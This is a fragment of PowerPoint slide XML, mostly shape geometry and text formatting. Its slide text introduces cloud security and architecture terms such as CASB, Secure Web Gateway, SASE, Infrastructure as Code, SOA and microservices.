                  <a:lnTo>
                    <a:pt x="612151" y="557152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620268" y="516889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620268" y="103377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="612151" y="63115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="590010" y="30257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557152" y="8116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="516889" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="DD69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5767" y="4591811"/>
              <a:ext cx="1952244" cy="195224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413753" y="3738117"/>
            <a:ext cx="6949440" cy="6972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90">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>CA</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-80">
                <a:solidFill>
                  <a:srgbClr val="44484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155">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>mediat</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="44484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75">
                <a:solidFill>
                  <a:srgbClr val="44484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9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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>acces</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="44484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0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50">
                <a:solidFill>
                  <a:srgbClr val="44484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12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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>clou</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-60">
                <a:solidFill>
                  <a:srgbClr val="44484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2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ser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v</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-60">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ices</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ent</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="44484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40">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>rprise</a:t>
            </a:r>
            <a:endParaRPr sz="2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2200" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="44484E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55">
                <a:solidFill>
                  <a:srgbClr val="44484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30">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>er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0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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>acros</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="44484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3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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>al</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="44484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10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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="44484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0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44484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44484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60">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>evices.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13753" y="5339588"/>
            <a:ext cx="535241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90">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>CA</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-80">
                <a:solidFill>
                  <a:srgbClr val="44484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155">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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44484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2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90">
                <a:solidFill>
                  <a:srgbClr val="44484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65">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>mp</a:t>
            </a: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15">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ement</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="44484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40">
                <a:solidFill>
                  <a:srgbClr val="44484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6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44484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14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pro</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-125">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>xy</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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44484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5">
                <a:solidFill>
                  <a:srgbClr val="44484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13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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>via</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>API.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34742" y="7335393"/>
            <a:ext cx="11375390" cy="69723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101725" marR="5080" indent="-1089660">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="80"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-130">
                <a:solidFill>
                  <a:srgbClr val="44484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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Next-Generation</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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35">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Gateway,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>such</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Access</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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Service</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Edge</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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(SASE)</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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44484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14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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-68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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>combination</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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44484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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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35">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Gateway,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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Data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Loss</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-13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Prevention,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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44484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1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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>CASB.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50183" y="1933193"/>
            <a:ext cx="1015936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Cloud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Access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Security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Broker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(CASB)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enterprise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management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software.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61609" y="4258436"/>
            <a:ext cx="573151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5"/>
              <a:t>Infrastructure</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-110"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="190"/>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-110"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="90"/>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-95"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="100"/>
              <a:t>Concepts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94935" y="306451"/>
            <a:ext cx="68630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70">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Services</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-155">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="120">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Integration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175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and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110">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Microservices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83864" y="760476"/>
            <a:ext cx="9395460" cy="3657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68440" y="4200453"/>
            <a:ext cx="3110483" cy="316808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275203" y="6714490"/>
            <a:ext cx="2407285" cy="6972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17475">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-60">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Service-Oriented</a:t>
            </a:r>
            <a:endParaRPr sz="2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2200" spc="-70">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Arch</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="44484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ctur</a:t>
            </a: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0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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="44484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65">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>OA)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05618" y="6684085"/>
            <a:ext cx="3159760" cy="6978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2200" spc="10">
                <a:solidFill>
                  <a:srgbClr val="44484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20">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>er</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-60">
                <a:solidFill>
                  <a:srgbClr val="44484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114">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="44484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9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5">
                <a:solidFill>
                  <a:srgbClr val="44484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50">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>gration</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114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and</a:t>
            </a:r>
            <a:endParaRPr sz="2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orchestration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53995" y="1882292"/>
            <a:ext cx="11148695" cy="1595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162425" marR="5080" indent="-4150360">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Service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integrations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centered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around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monolithic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client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server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applications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such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outing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security.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50">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marR="253365">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Microservices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986081" y="3482149"/>
            <a:ext cx="4131945" cy="3620135"/>
            <a:chOff x="5986081" y="3482149"/>
            <a:chExt cx="4131945" cy="362013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87411" y="5138927"/>
              <a:ext cx="1374648" cy="137464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990844" y="6566916"/>
              <a:ext cx="4122420" cy="530225"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4122420" h="530225">
                  <a:moveTo>
                    <a:pt x="745108" y="12191"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="524382"/>
                  </a:lnTo>
                </a:path>
                <a:path w="4122420" h="530225">
                  <a:moveTo>
                    <a:pt x="3474720" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4122165" y="530097"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="E3B36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097011" y="3486911"/>
              <a:ext cx="11430" cy="720090"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="11429" h="720089">
                  <a:moveTo>
                    <a:pt x="11430" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="719963"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9525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94935" y="306451"/>
            <a:ext cx="68630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70">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Services</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-155">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="120">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Integration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175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and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110">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Microservices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83864" y="760476"/>
            <a:ext cx="9395460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694366" y="2913888"/>
            <a:ext cx="9464040" cy="1729739"/>
            <a:chOff x="3694366" y="2913888"/>
            <a:chExt cx="9464040" cy="1729739"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3708653" y="3441954"/>
              <a:ext cx="9435465" cy="1187450"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9435465" h="1187450">
                  <a:moveTo>
                    <a:pt x="0" y="197866"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5228" y="152515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20121" y="110875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43487" y="74135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74135" y="43487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110875" y="20121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152515" y="5228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197866" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9237218" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9282568" y="5228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9324208" y="20121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9360948" y="43487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9391596" y="74135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9414962" y="110875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9429855" y="152515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9435084" y="197866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9435084" y="989330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9429855" y="1034680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9414962" y="1076320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9391596" y="1113060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9360948" y="1143708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9324208" y="1167074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9282568" y="1181967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9237218" y="1187196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197866" y="1187196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152515" y="1181967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110875" y="1167074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74135" y="1143708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43487" y="1113060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20121" y="1076320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5228" y="1034680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="989330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="197866"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="2857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918203" y="2913888"/>
              <a:ext cx="5457825" cy="673735"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5457825" h="673735">
                  <a:moveTo>
                    <a:pt x="5345176" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="112268" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68580" y="8826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32893" y="32892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8826" y="68579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="112267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="561339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8826" y="605027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32893" y="640714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68580" y="664781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112268" y="673608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5345176" y="673608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5388863" y="664781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5424551" y="640714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5448617" y="605027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5457444" y="561339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5457444" y="112267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5448617" y="68579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5424551" y="32892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5388864" y="8826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5345176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3694366" y="4809744"/>
            <a:ext cx="9464040" cy="1693545"/>
            <a:chOff x="3694366" y="4809744"/>
            <a:chExt cx="9464040" cy="1693545"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="object 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3708653" y="5310377"/>
              <a:ext cx="9435465" cy="1178560"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9435465" h="1178560">
                  <a:moveTo>
                    <a:pt x="0" y="196342"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5184" y="151315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19952" y="109986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43127" y="73531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73531" y="43127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109986" y="19952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151315" y="5184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196342" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9238742" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9283768" y="5184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9325097" y="19952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9361552" y="43127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9391956" y="73531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9415131" y="109986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9429899" y="151315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9435084" y="196342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9435084" y="981710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9429899" y="1026736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9415131" y="1068065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9391956" y="1104520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9361552" y="1134924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9325097" y="1158099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9283768" y="1172867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9238742" y="1178052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196342" y="1178052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151315" y="1172867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109986" y="1158099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73531" y="1134924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43127" y="1104520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19952" y="1068065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5184" y="1026736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="981710"/>
                  </a:lnTo>
